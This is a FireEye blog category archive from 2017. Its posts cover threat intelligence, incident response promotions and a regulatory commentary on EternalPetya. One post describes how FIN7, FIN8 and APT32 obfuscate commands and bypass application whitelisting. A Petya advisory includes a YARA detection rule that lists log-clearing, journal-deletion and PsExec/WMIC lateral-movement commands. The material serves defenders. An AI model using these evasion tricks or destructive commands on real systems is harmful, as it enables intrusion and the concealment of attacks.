Category Archives: FireEye

  • 0

Kevin Mandia, CEO of FireEye, Speaks at DoDIIS17 About Cybersecurity

Category : FireEye

Kevin Mandia, CEO of FireEye, talks about Russia, China, Iran, North Korea and cyber security at at DoDIIS17


  • 0

The CISO’s Most Effective Weapon, Threat Intelligence

Category : FireEye

Today’s most successful CISOs embrace cyber threat intelligence (CTI). Contextual, high-fidelity intelligence helps security teams understand attackers and prioritize responses to give organizations the upper hand.

Download The CISO’s Most Effective Weapon: Threat Intelligence white paper to learn:

  • What differentiates actionable threat intelligence from undifferentiated volumes of alert data
  • Why security teams must understand the motives and abilities of adversaries in context
  • How to transition from reliance on low-quality threat feeds and regulatory concerns to security programs that effectively recognize and respond to attacks.

Get your white paper today.

  • 0

Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science

Category : FireEye

Many attackers continue to leverage PowerShell as a part of their malware ecosystem, mostly delivered and executed by malicious binaries and documents. Of malware that uses PowerShell, the most prevalent use is the garden-variety stager: an executable or document macro that launches PowerShell to download another executable and run it. There has been significant development and innovation in the field of offensive PowerShell techniques. While defenders and products have implemented greater PowerShell visibility and improved detection, the offensive PowerShell community has adapted their tools to avoid signature-based detections. Part of this response has come through an increased use of content obfuscation – a technique long employed at both the binary and content level by traditional malware authors.

In our Revoke-Obfuscation white paper, first presented at Black Hat USA 2017, we provide background on obfuscated PowerShell attacks seen in the wild, as well as defensive mitigation and logging best practices. We then make the case for the inefficiencies of static detection by exploring the many layers of obfuscation now available to attackers for launching PowerShell scripts, shortening and complicating commands contained within the scripts, manipulating strings, and using alternate and obscure methods to evade defenders. We then present a number of unique approaches for interpreting, categorizing, and processing obfuscated PowerShell attributes in order to build a framework for high fidelity obfuscation detection. To support our research, we collected an unprecedented PowerShell data corpus comprised of 408,000 scripts – including 7,000 manually-reviewed and labeled scripts – from a vast set of sources, both public and previously unavailable. In addition to releasing the PowerShell data corpus, we have released the Revoke-Obfuscation framework, which has been used in numerous Mandiant investigations, to assist the security community in classifying PowerShell scripts’ obfuscation at scale.

Download the Revoke-Obfuscation white paper today.


Author: Daniel Bohannon, Lee Holmes 

  • 0

In EternalPetya’s Wake, How Could Regulators Punish Victims?

Category : FireEye

The EternalPetya (aka NotPetya, NonPetya, ExPetr) virus that quickly spread to innumerable systems at the end of June left a trail of destruction across the globe. Businesses of all sizes have publicly acknowledged that they will suffer materially negative economic consequences from the attack, with more sure to come.

The impact of EternalPetya’s rampage extends far beyond the immediate concerns of restarting and rebuilding information technology capabilities. Threats of criminal charges loom for some in Europe, while here in the U.S. regulators are ramping up investigations into why and how badly companies fell victim to this cyber campaign.

In the lead is the New York Department of Financial Services (DFS), which has implemented one of the toughest cybersecurity regulatory schemes in the nation. In a Wall Street Journal Pro Cybersecurity Commentary & Analysis piece emailed to subscribers, New York DFS Superintendent Maria T. Vullo said her agency has already been in contact with regulated entities to “ensure appropriate steps are taken,” as attacks like EternalPetya “reinforce the critical need for minimal regulatory standards and robust cybersecurity programs.”

In light of Superintendent Vullo’s statement, what sections of new cybersecurity rule should DFS regulated entities focus on when New York pays them a visit? Here are some thoughts:

  • 500.02 – Cybersecurity Program: DFS is sure to look to see whether the overall program was adequate/sufficient.
  • 500.03 – Cybersecurity Policy: DFS will no doubt investigate the sufficiency of individual policies, including business continuity/disaster recovery and incident response policies.
  • 500.05 – Penetration Testing and Vulnerability Assessments: Questions will likely be asked about whether penetration testing should have caught the entry points used by EternalPetya, as well as whether its consequences were adequately considered.
  • 500.09 – Risk Assessments: DFS is sure to investigate whether the underlying risk assessment was “sufficient.”
  • 500.11 – Third Party Service Provider Security Policy: This will be a big question mark for DFS, as even if the regulated entity itself wasn’t hit, almost assuredly some of its service providers were. DFS can ask whether the due diligence and minimum security procedures hit the appropriate benchmarks in light of EternalPetya-caused disruptions.
  • 500.16 – Incident Response Plans: This is self-explanatory. For any regulated entity that suffered some sort of service disruption, DFS will carefully examine whether its incident response plans were properly designed to allow for “prompt” response and recovery. This is especially true since the rule explicitly talks about incident response plans in the context of cyber attacks impacting the integrity, availability, and continuing functionality of information systems and business generally.

Two important notes here. First, the aforementioned sections are by no means intended to be exhaustive. Rather, it is intended to show how much leeway the new rule gives DFS to declare that a regulated financial entity is out of compliance and thus potentially subject to fines.

Second, the DFS cybersecurity rule is still being phased in. DFS does not yet have the authority to impose fines, and in some cases will not have the power to do so for upwards of 18 months.

Part of the inquiries into the scope of EternalPetya’s impact will no doubt focus on how vulnerable companies are to exploits and hacking tools allegedly taken from U.S. government agencies. Hackers have quickly grown adept at weaponizing these exploits to conduct prolific malware campaigns that impact hundreds of organizations across the globe.

EternalPetya and the WannaCry campaigns leveraged an SMB (Server Message Block) exploit dubbed EternalBlue to allow the malware to spread rapidly within a penetrated organization. The propagation mechanism enabled the rapid distribution of the malware both within a compromised network and over the public Internet.

EternalBlue was leveraged in the EternalPetya campaign as well, but additional tactics were also deployed to ensure effective propagation in environments where EternalBlue was not effective. The ramifications for the incorporation of worm-like features within ransomware, or destructive or disruptive malware in general, substantively intensifies threats within an already massively expanding threat landscape. Furthermore, the widespread availability of ransomware and these exploits coupled with the highly-publicized effectiveness of these campaigns – at least in terms of propagation – has undoubtedly resonated among a variety of different threat actors, all with different motivations.

Even before this development, FireEye had observed a significant escalation in the scope and sophistication of cyber extortion tools. Having already demonstrated utility in financially-motivated campaigns, it is also possible for these tools to be increasingly used by nation-states, likely as a means of compellence. Given the likely nexus to nation-state actors, the WannaCry and EternalPetya campaigns subscribe to this narrative.

The lessons of EternalPetya should be painfully clear then to New York DFS regulated entities and for others who fall under the jurisdiction of some form of government regulation: regulators will have plenty of ways to declare that the security measures of cyber victims were somehow inadequate, thereby exposing them to punishment.

So beware those who are regulated – the actual cyber attack is likely to be only the first round of pain to be inflicted.


Author: Brian Finch, David Mainor


  • 0

Government Moves to the Cloud – FireEye Government Email Threat Prevention Receives FedRAMP Authorization

Category : FireEye

Given recent high-profile incidents, cyber security has quickly risen to the top of the priority list for many organizations, including governments. The U.S. government has increased its annual cyber security budget by 35 percent, going from $14 billion budgeted in 2016 to $19 billion in 2017, and reports indicate that governments around the globe are expected to double down on cyber protection this year.

As with many organizations these days, government information technology and security is migrating to the cloud. This is largely driven by the federal CIO “Cloud First” mandate specifying that agencies consider cloud services first for procurements when meeting security, reliability and cost requirements. Cloud-delivered products can significantly reduce cost and complexity compared to on-premises products, so it’s no surprise that cloud services are coming out on top.

Email Migration to the Cloud

As government and public education entities migrate to Office 365, Google Mail or other solutions for their primary email management service, they’re also looking for email security that delivers advanced threat protection, and this requires a service that is FedRAMP authorized.

FireEye Government Email Threat Prevention (ETP), an email security service focused on advanced threat protection, was granted an Authority to Operate (ATO) by the U.S. Department of the Interior (DOI) on April 26, 2017 and achieved a FedRAMP Authorization on July 5, 2017.

Government ETP enables government entities to save time and money as they add email security for advanced threat protection. Governments can now confirm that the DOI authorization package meets their security requirements and issue their own ATOs in parallel with the procurement process, accelerating their migration to using Government ETP.

FireEye Government ETP is available today as a subscription, ensuring customers continue to benefit from intelligence-led feature updates at no additional cost. For existing FireEye EX appliance customers, upgrade programs are available.

Learn more about FireEye Government ETP, and check out our podcast to hear FireEye CTO Grady Summers speak with FireEye Global Government CTO Tony Cole and Risk Management Lead Stacey Ziegler about how FireEye will support the government as it moves to the cloud.


Auhtor: Elizabeth Flammini

  • 0

Are you Ready to Respond?

Category : FireEye

“In our current state of cyber security, security breaches are inevitable.” — Kevin Mandia, CEO, FireEye

In 2016 there were 1,093 publicized cyber security breaches. That’s a 40% increase from 2015.1 Given this era’s upsurge in breach activity, it’s no longer about whether you’ll be breached. It’s how you’ll respond when you are breached. Organizations with a well-designed response capability are better off.

Join Troy Scavella, FireEye Principal Consultant and Ahmet Rifki, Sr. Consultant for our webinar on July 20. They will cover several topics, including:

  • Six primary areas of focus for an effective response plan
  • Best practices for each of those areas
  • Examples of how deficiencies in any area reduce an organization’s ability to effectively detect and respond to a cyber security incident, whether targeted or opportunistic.

Jul 20 2017 11:00 am

Duration: 60 min

Featured Speakers

Troy Scavella
Principal Consultant
FireEye, Inc.

Ahmet Rifki
Sr. Consultant
FireEye, Inc.

  • 0

Are You Ready to Respond? Evaluate and Improve Your Ability to Respond to the Next Attack

Category : FireEye

“In our current state of cyber security, security breaches are inevitable. This is an important fact, so I am intentionally repeating it. In our current state of cyber security, security breaches are inevitable.”
                                                                                                            FireEye CEO Kevin Mandia, 2011

It has been nearly six years, but not much has changed since FireEye CEO Kevin Mandia spoke those words during his testimony to the U.S. House Permanent Select Committee on Intelligence at an October 2011 hearing.

Having systems in place to prevent as many breaches as possible is only one piece of a thorough defense. Today’s advanced threat landscape also requires a detailed incident response strategy to detect and respond to a breach, along with the expertise to execute it. As soon as an organization identifies an attacker in their network, they need to move quickly to minimize damage to their infrastructure, their brand and their customers.

In our white paper, Are You Ready to Respond? Evaluate and Improve Your Ability to Respond to the Next Attack, we discuss why an incident response plan is essential for every organization, and discuss in detail six key areas for every response plan:

  • Governance
  • Communication
  • Visibility
  • Intelligence
  • Response
  • Metrics

Additionally, the report discusses our approach to assessing an organization’s readiness, and details how we rank each of the six aforementioned capabilities on a scale of 0 to 5. By the end of the report, organization’s will have a clear vision of how to:

  • Develop a response plan that safeguards critical systems and information without disrupting core business functions.
  • Improve their response system to shorten the time between detecting an intrusion and resolving the breach.
  • Evolve their response plan as needs change.

Download the white paper today.

  • 0

Targeted Attackers Lead the Way in Evasion Techniques

Category : FireEye

Throughout 2017 we have observed a marked increase in the use of command line evasion and obfuscation by a range of targeted attackers. Cyber espionage groups and financial threat actors continue to adopt the latest cutting-edge application whitelisting bypass techniques and introduce innovative obfuscation into their phishing lures. These techniques often bypass static and dynamic analysis methods and highlight why signature-based detection alone will always be at least one step behind creative attackers.

In early 2017, FIN8 began using environment variables paired with PowerShell’s ability to receive commands via StdIn (standard input) to evade detection based on process command line arguments. In the February 2017 phishing document “COMPLAINT Homer Glynn.doc” (MD5: cc89ddac1afe69069eb18bac58c6a9e4), the file contains a macro that sets the PowerShell command in one environment variable (_MICROSOFT_UPDATE_CATALOG) and then the string “powershell -” in another environment variable (MICROSOFT_UPDATE_SERVICE). When a PowerShell command ends in a dash then PowerShell will execute the command that it receives via StdIn, and only this dash will appear in powershell.exe’s command line arguments. Figure 1 provides the commands that were extracted using Mandiant consultant Nick Carr’s FIN8 macro decoder.

Figure 1: FIN8 environment variable commands extracted from “COMPLAINT Homer Glynn.doc” macros

To evade many detections based on parent-child process relationships, FIN8 crafted this macro to use WMI to spawn the cmd.exe execution. Therefore, WinWord.exe never creates a child process, but the process tree looks like: wmiprvse.exe > cmd.exe > powershell.exe. FIN8 has regularly used obfuscation and WMI to remotely launch their PUNCHTRACK POS-scraping malware, and the 2017 activity is an implementation of these evasion techniques at an earlier stage of compromise.

As new application whitelisting bypass techniques have surfaced, targeted attackers have quickly adopted these into their campaigns with extra layers of obfuscation to stay ahead of many defenders. Many groups leverage the regsvr32.exe application whitelisting bypass, including APT19 in their 2017 campaign against law firms. The cyber espionage group APT32 heavily obfuscates their backdoors and scripts, and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017. Instead of using the argument /i:http for the regsvr32.exe bypass, APT32 used cmd.exe obfuscation techniques to attempt to break signature-based detection of this argument. At FireEye we have seen them include both /i:^h^t^t^p and /i:h”t”t”p in their lures. Figure 2 shows a redacted screenshot of our Host Investigative Platform (HIP) capturing real-time attacker activity during one of our Mandiant incident response engagements for APT32 activity.

Figure 2: APT32 command obfuscation for regsvr32.exe application whitelisting bypass

Meanwhile, FIN7 has continued to wreak havoc on the restaurant, hospitality, and financial services sectors in 2017. To ensure their arsenal did not grow stale, in April 2017 FIN7 shifted to using wscript.exe to run JavaScript payloads that retrieve an additional payload hidden in the phishing document by use of the Word.Application COM object.

This week, FireEye identified FIN7 introducing additional obfuscation techniques at both the JavaScript and cmd.exe levels. These methods rely on FIN7’s preferred method of hiding shortcut files (LNK files) in their DOCX and RTF phishing documents to initiate the infection. At the time of this blog, the files implementing this technique were detected by 0 antivirus engines. For JavaScript, instead of specifying “Word.Application” for the COM object instantiation, FIN7 began concatenating the string to “Wor”+”d.Application”. In addition, JavaScript’s suspicious “eval” string was transformed into “this[String.fromCharCode(101)+’va’+’l’]”. Finally, they used a little-known character replacement functionality supported by cmd.exe. The wscript.exe command is set in a process-level environment variable “x”, but is obfuscated with the “@” character. When the “x” variable is echoed at the end of the script the “@” character is removed by the syntax “%x:@=%”. Figure 3 shows this command extracted from a LNK file embedded within a new FIN7 phishing document.

Figure 3: FIN7 command obfuscation from LNK file phishing document

In this example, FIN7 implements FIN8’s passing of commands via StdIn – this time passing it to cmd.exe instead of powershell.exe – but the evasion effect is the same. While this example will expose these arguments in the first cmd.exe’s command execution, if this environment variable were set within the LNK or a macro and pushed to cmd.exe via StdIn from VBA, then nothing would appear on the command line.

The FireEye iSIGHT Intelligence MySIGHT Portal contains detailed information on these attackers – and all financial and cyber espionage groups that we track – including analysis of their malware, tactics, and further intelligence attribution.

We fully expect targeted attackers to continue this pattern of adopting new bypass techniques and adding innovative obfuscation at both the macro and command line levels. As for what we might see next, we’d recommend reading up on DOS command line tricks so that monitoring your network isn’t the first time you see new attacker tricks. Network defenders must understand what obfuscation is possible, assess their endpoint and network visibility, and most importantly not rely on a single method to detect these attacks.


Author: Daniel Bohannon, Nick Carr

  • 0

Petya Ransomware Spreading Via EternalBlue Exploit

Category : FireEye

On June 27, 2017, multiple organizations – many in Europe – reported significant disruptionsthey are attributing to Petya ransomware. Based on initial information, this variant of the Petya ransomware may be spreading via the EternalBlue exploit used in the WannaCry attack from last month.

Trusted sources and open-source reporting have suggested that the initial infection vector for this campaign was a poisoned update for the MeDoc software suite, a software package used by many Ukrainian organizations. The timing of a MeDoc software update, which occurred on June 27, is consistent with initial reporting of the ransomware attack, and the timing correlates to lateral movement via PSExec we observed in victim networks starting around 10:12 UTC. Additionally, the MeDoc website currently displays a warning message in Russian stating: “On our servers is occurring a virus attack. Our apologies for the temporary inconvenience!”

Our initial analysis of the artifacts and network traffic at victim networks indicate that a modified version of the EternalBlue SMB exploit was used, at least in part, to spread laterally along with WMI commands, MimiKatz, and PSExec to propagate other systems. Analysis of the artifacts associated with this campaign is still ongoing and we will update this blog as new information come available.

FireEye has confirmed the following two samples related to this attack:

  • 71b6a493388e7d0b40c83ce903bc6b04
  • e285b6ce047015943e685e6638bd837e

FireEye has mobilized a Community Protection Event and is continuing to investigate these reports and the threat activity involved in these disruptive incidents. FireEye as a Service (FaaS) is actively engaged in monitoring customer environments.

While FireEye detection leverages behavioral analysis of malicious techniques, our team has created a YARA rule to assist organizations in retroactively searching their environments for this malware, as well as detecting future activity. Our team has focused on the malicious attacker techniques that are core to the operation of the malware: SMB drive usage, ransom demand language, the underlying functions and APIs, and the system utilities used for lateral movement. The thresholds can be modified in the condition section that follows.

author=” @TekDefense,”
description=”Probable PETYA ransomware using ETERNALBLUE, WMIC, PsExec”
$dmap01 = “\\\\.\\PhysicalDrive” nocase ascii wide
$dmap02 = “\\\\.\\PhysicalDrive0” nocase ascii wide
$dmap03 = “\\\\.\\C:” nocase ascii wide
$dmap04 = “TERMSRV” nocase ascii wide
$dmap05 = “\\admin$” nocase ascii wide
$dmap06 = “GetLogicalDrives” nocase ascii wide
$dmap07 = “GetDriveTypeW” nocase ascii wide

$msg01 = “WARNING: DO NOT TURN OFF YOUR PC!” nocase ascii wide
$msg02 = “IF YOU ABORT THIS PROCESS” nocase ascii wide
$msg03 = “DESTROY ALL OF YOUR DATA!” nocase ascii wide
$msg05 = “your important files are encrypted” ascii wide
$msg06 = “Your personal installation key” nocase ascii wide
$msg07 = “worth of Bitcoin to following address” nocase ascii wide
$msg08 = “CHKDSK is repairing sector” nocase ascii wide
$msg09 = “Repairing file system on ” nocase ascii wide
$msg10 = “Bitcoin wallet ID” nocase ascii wide
$msg11 = “” nocase ascii wide
$msg12 = “1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX” nocase ascii wide
$msg_pcre = /(en|de)crypt(ion|ed\.)/

$functions01 = “need dictionary” nocase ascii wide
$functions02 = “comspec” nocase ascii wide
$functions03 = “OpenProcessToken” nocase ascii wide
$functions04 = “CloseHandle” nocase ascii wide
$functions05 = “EnterCriticalSection” nocase ascii wide
$functions06 = “ExitProcess” nocase ascii wide
$functions07 = “GetCurrentProcess” nocase ascii wide
$functions08 = “GetProcAddress” nocase ascii wide
$functions09 = “LeaveCriticalSection” nocase ascii wide
$functions10 = “MultiByteToWideChar” nocase ascii wide
$functions11 = “WideCharToMultiByte” nocase ascii wide
$functions12 = “WriteFile” nocase ascii wide
$functions13 = “CoTaskMemFree” nocase ascii wide
$functions14 = “NamedPipe” nocase ascii wide
$functions15 = “Sleep” nocase ascii wide // imported, not in strings

//  — Clearing event logs & USNJrnl
$cmd01 = “wevtutil cl Setup” ascii wide nocase
$cmd02 = “wevtutil cl System” ascii wide nocase
$cmd03 = “wevtutil cl Security” ascii wide nocase
$cmd04 = “wevtutil cl Application” ascii wide nocase
$cmd05 = “fsutil usn deletejournal” ascii wide nocase
// — Scheduled task
$cmd06 = “schtasks ” nocase ascii wide
$cmd07 = “/Create /SC ” nocase ascii wide
$cmd08 = ” /TN ” nocase ascii wide
$cmd09 = “at %02d:%02d %ws” nocase ascii wide
$cmd10 = “shutdown.exe /r /f” nocase ascii wide
// — Sysinternals/PsExec and WMIC
$cmd11 = “-accepteula -s” nocase ascii wide
$cmd12 = “wmic”
$cmd13 = “/node:” nocase ascii wide
$cmd14 = “process call create” nocase ascii wide

// (uint16(0) == 0x5A4D)
3 of ($dmap*)
and 2 of ($msg*)
and 9 of ($functions*)
and 7 of ($cmd*)

FireEye has read reports that the malware is spread by an email lure containing a malicious Office document attachment or links to infected documents exploiting CVE-2017-0199. We are confident that this document is unrelated to the current outbreak of activity, and we have seen no other indicators that CVE-2017-0199 is related. While FireEye detects these campaigns, we have not observed any correlation with known victims of the Petya attacks.


This activity highlights the importance of organizations securing their systems against the EternalBlue exploit and ransomware infections. Microsoft has provided a guide for securing Windows systems against the EternalBlue exploit in the context of the WannaCry ransomware. A robust back-up strategy, network segmentation and air gapping where appropriate, and other defenses against ransomware can help organizations defend against ransomware distribution operations and quickly remediate infections.


Author:  John Miller, Matt Allen, Christopher Glyer, Ian Ahl, Nick Carr

  • 0

Resolve security incidents quickly, efficiently and at scale

Category : FireEye

Your business is your top priority. At best, attacks are a distraction. At their worst, they can cripple your operations.

Mandiant, a FireEye company, has dedicated incident responders in over 30 countries to help you quickly investigate and thoroughly remediate attacks, so you can get back to what matters most: your business. Mandiant helps protect you with more than a decade of experience responding to thousands of incidents and conducting intrusion investigations.

Our consultants combine their expertise with industry-leading threat intelligence and network and endpoint technology to help you with a wide range of activities — from technical response to crisis management. Whether you have 1,000 or 100,000 endpoints, our consultants can be up and running in a matter of hours, analyzing your networks for malicious activity.